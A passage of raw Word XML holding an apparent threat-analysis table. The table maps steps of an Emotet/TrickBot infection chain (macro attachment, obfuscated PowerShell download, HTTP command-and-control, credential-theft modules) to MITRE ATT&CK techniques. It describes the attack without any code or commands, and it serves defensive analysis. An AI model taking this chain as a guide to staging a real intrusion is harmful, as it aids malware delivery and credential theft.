          <w:p w14:paraId="1BC93944" w14:textId="7073917D" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B2BDED5" w14:textId="436DB219" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D109507" w14:textId="1BDD4CCC" w:rsidR="000C5B1A" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="000C5B1A" w:rsidRPr="00D3685E">
              <w:t>An obfuscated PowerShell script is</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> [subsequently]</w:t>
            </w:r>
            <w:r w:rsidR="000C5B1A" w:rsidRPr="00D3685E">
              <w:t xml:space="preserve"> executed </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w14:paraId="222182A2" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6376020A" w14:textId="1A6818E3" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4139309F" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A0B0852" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1204.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">User Execution : </w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="244B1359" w14:textId="23DA5441" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00FE2DD5" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69B242F2" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ADF5E2A" w14:textId="1CA14AB8" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00557327" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F3203D6" w14:textId="69FFF5E1" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00FB3011" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/</w:t>
            </w:r>
            <w:r w:rsidR="00557327">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CCA2605" w14:textId="59B4408D" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00FB3011" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C5B1A">
              <w:t>once a user has opened the attachment and enabled macro functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w14:paraId="0D3A496C" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1AC56C" w14:textId="66D7ACF4" w:rsidR="000C5B1A" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00148FE3" w14:textId="2ED1BD9A" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE0AE2A" w14:textId="73C8E10A" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007D5BB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007D5BB5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59864BA9" w14:textId="5134AC51" w:rsidR="000C5B1A" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58420DDF" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69487969" w14:textId="731D57D5" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00FB3011" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10118809" w14:textId="455CB6DC" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="00FB3011" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B9C7B7E" w14:textId="673874B5" w:rsidR="000C5B1A" w:rsidRPr="00B857D7" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve">A PowerShell script downloads either </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Emotet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Bokbot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Trickbot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A553D" w:rsidRPr="004A553D" w14:paraId="07D5ACA6" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02726382" w14:textId="5A9A12F2" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7960191C" w14:textId="2EBDCDC8" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76B051CA" w14:textId="55461D2B" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="653EA4A6" w14:textId="428C3757" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F3F4E4B" w14:textId="77777777" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AAB72DB" w14:textId="1833DB9A" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E620CB6" w14:textId="2E52AF71" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628E4ABA" w14:textId="7A1D8C3E" w:rsidR="004A553D" w:rsidRPr="004A553D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] PowerShell Empire, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> modules communicate over http</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w14:paraId="2E421D7C" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0601225B" w14:textId="76FE2DDB" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="0056392C" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="748FA0CC" w14:textId="307D5D72" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">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964" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4518A49A" w14:textId="246FDFA2" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="644" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6F7066" w14:textId="70DFFAD5" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="00D4300F" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="629" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52FF41B5" w14:textId="77777777" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="000C5B1A" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="558" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E3E8F4C" w14:textId="71FAC214" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1737EBB3" w14:textId="26C64C32" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE/IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5759E20E" w14:textId="33FC52A1" w:rsidR="000C5B1A" w:rsidRPr="00D3685E" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve">Downloads either </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Emotet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Bokbot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>Trickbot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve">, with the end payload being </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve">. Within hours of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve"> being executed, additional </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="000C5B1A">
              <w:t>TrickBot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="000C5B1A">
              <w:t xml:space="preserve"> modules are installed for network reconnaissance and credential theft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A553D" w:rsidRPr="00B857D7" w14:paraId="50A60676" w14:textId="77777777" w:rsidTr="008D17AE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39656971" w14:textId="6EFE53D4" w:rsidR="004A553D" w:rsidRDefault="0056392C" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1485" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="028ADA56" w14:textId="74F4754F" w:rsidR="004A553D" w:rsidRPr="0036593D" w:rsidRDefault="004A553D" w:rsidP="000C5B1A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A553D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
